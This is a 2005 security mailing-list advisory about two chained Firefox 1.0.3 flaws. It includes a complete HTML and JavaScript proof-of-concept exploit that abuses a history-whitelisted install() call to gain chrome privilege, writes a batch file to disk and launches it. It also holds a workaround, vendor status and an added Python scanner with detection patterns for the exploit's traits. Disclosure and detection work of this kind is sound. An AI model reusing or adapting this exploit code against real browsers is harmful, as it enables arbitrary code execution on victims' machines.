[EXPL] Mozilla Firefox Arbitrary Code Execution (Exploit)
From: SecuriTeam (support_at_securiteam.com)
Date: 05/10/05
To: list@securiteam.com Date: 10 May 2005 13:15:28 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Mozilla Firefox Arbitrary Code Execution (Exploit)
------------------------------------------------------------------------
SUMMARY
Mozilla Firefox (originally known as Phoenix and briefly as Mozilla
Firebird) is "a free, cross-platform, graphical web browser developed by
the Mozilla Foundation and hundreds of volunteers".
Two vulnerabilities have been discovered in Firefox that can be exploited
by malicious people to run malicious code on vulnerable systems and
compromise their integrity.
DETAILS
Vulnerable Systems:
* Mozilla Firefox version 1.0.3
This proof of concept involves exploiting two flaws:
1) Tricking Firefox into thinking a software installation is being
triggered by a whitelisted site, by using a trusted URL stored in history.
2) The software installation trigger does not sufficiently check image
URLs, so an image URL containing JavaScript code is accepted.
Workaround:
Disable software installation (Web Features panel of the
Options/Preferences window in Firefox 1.0.3 or the Content panel in the
latest trunk builds).
Vendor Status:
The Mozilla Foundation has partially patched this issue on the server side
by adding random letters and numbers to the install function, which
prevents this exploit from working. We anticipate that the Mozilla
Foundation will release a Firefox 1.0.4 update shortly.
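As an added, defender-side example that is not part of the advisory or of any Mozilla code: a small Python scanner that flags HTML carrying the traits the proof of concept chains together (a javascript: iframe source, an install() call whose image/icon URL is itself a javascript: URL, the UniversalXPConnect privilege request, and the history rewind). The sample fragments and the rule names are constructed for this example; it complements the workaround above for anyone inspecting web content or proxy captures.

```python
import re

# Constructed sample inputs (not the advisory's own markup): one fragment shaped
# like the proof of concept, one benign page that links to the same add-on site.
SAMPLE_EXPLOIT = r"""<iframe onload="loader()" src="javascript:'<noscript>'+eval('install(event, \'Update\', \'javascript:eval(\\\'netscape.security.PrivilegeManager.enablePrivilege(\\\\\\\'UniversalXPConnect\\\\\\\')\\\')\')')"></iframe>
<script>function loader(){ stealcookies.history.go(-1) }</script>"""
SAMPLE_BENIGN = r"""<a href="https://addons.update.mozilla.org/extensions/moreinfo.php?id=220">More info</a>
<iframe src="https://example.invalid/frame.html"></iframe>"""

# One rule per trait of the proof of concept; the rule names are my own.
RULES = {
    # a frame whose source is a javascript: URL (the history/whitelist trick)
    "javascript_iframe_src": re.compile(r'''<iframe[^>]*\bsrc\s*=\s*["']?\s*javascript:''', re.I),
    # install(event, name, iconURL) where the icon URL itself is javascript:
    "install_with_javascript_icon": re.compile(r"\binstall\s*\([^)]*javascript:", re.I | re.S),
    # request for the chrome-level privilege the payload needs to write files
    "privilege_escalation_call": re.compile(r"enablePrivilege\s*\([^)]*UniversalXPConnect", re.I),
    # stepping the frame back in history to a previously trusted URL
    "history_rewind_in_frame": re.compile(r"\.history\.go\s*\(\s*-\d+\s*\)", re.I),
}


def scan_html(body: str) -> list:
    """Return the names of every rule that matches; an empty list means nothing was seen."""
    return [name for name, rx in RULES.items() if rx.search(body)]


def is_suspicious(body: str) -> bool:
    """Flag a page only when the two flaws the advisory chains both appear:
    a javascript: frame source and an install() call with a javascript: image URL."""
    hits = set(scan_html(body))
    return {"javascript_iframe_src", "install_with_javascript_icon"} <= hits


if __name__ == "__main__":
    for label, page in (("poc-shaped", SAMPLE_EXPLOIT), ("benign", SAMPLE_BENIGN)):
        print(label, scan_html(page), "suspicious" if is_suspicious(page) else "clean")
```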
Exploit:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Firefox Full Remote Compromise</title>
</head>
<body>
Click anywhere inside this page to compromise your system!<br>
Don't worry. Only a harmless batch file will be run. View the source if
you dont believe me ;)<br>
Like I said in my Internet Explorer Auto-SP2 RC analysis, nothing is
perfect. Breaking something, or if you're the hacker, building something,
only requires patience and a little bit of spare time.<br> <br>
Greetz to Mikx, Michael Evanchik, and the entire Mozilla team. This is a
very nice browser you guys have put together!
<iframe onload="loader()" src="javascript:'<noscript>'+eval('if
(window.name!=\'stealcookies\')
{ window.name=\'stealcookies\'; } else { event=
{ target:{ href:
\'http://ftp.mozilla.org/pub/mozilla.org/extensions/flashgot/flashgot-0.5.9.1-fx+mz+tb.xpi\'} };
install(event, \'You are
vulnerable!!!\',\'javascript:eval(\\\'netscape.security.PrivilegeManager.
enablePrivilege(\\\\\\\'UniversalXPConnect\\\\\\\'); file =
Components.classes
[\\\\\\\'@mozilla.org/file/local;1\\\\\\\'].createInstance(Components.interfaces.nsILocalFile);
file.initWithPath(\\\\\\\'c:\\\\\\\\\\\\\\\\booom.bat\\\\\\\');
file.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE,420);
outputStream =
Components.classes[\\\\\\\'@mozilla.org/network/file-output-stream;1\\\\\\\'].
createInstance( Components.interfaces.nsIFileOutputStream );
outputStream.init(file,0x04|0x08|0x20,420,0); output=\\\\\\\'@ECHO
off\\\\\\\\ncls\\\\\\\\n
ECHO If I wasnt so nice, this could have been a virus...
\\\\\\\\nPAUSE\\\\\\\';
outputStream.write(output,output.length); outputStream.close();
file.launch();\\\')\'); }') + '</noscript><a
href=\'https://addons.update.mozilla.org/extensions/moreinfo.php?id=220&
application=firefox\' style=\'cursor:default;\'> </'+'a>'"
id="targetframe" scrolling="no" frameborder="0" marginwidth="0"
marginheight="0"
style="position:absolute; left:0px; width:0px;height:6px; width:6px;
margin:0px;
padding:0px; -moz-opacity:0"></iframe>
<script language="JavaScript" type="text/javascript">
document.onmousemove = function trackMouse(e) {
document.getElementById("targetframe").style.left = (e.pageX-3)+"px"
document.getElementById("targetframe").style.top = (e.pageY-3)+"px"
}
var counter = 0;
function loader() {
counter++
if(counter == 1) {
stealcookies.focus()
} else if(counter == 2) {
stealcookies.history.go(-1)
//targetframe.style.display="none";
}
}
</script>
</body>
</html>
Bugzilla:
https://bugzilla.mozilla.org/show_bug.cgi?id=292691 (limited access)
ADDITIONAL INFORMATION
The information has been provided by tuytumadre@att.net.
The original article can be found at:
http://greyhatsecurity.org/vulntests/ffrc.htm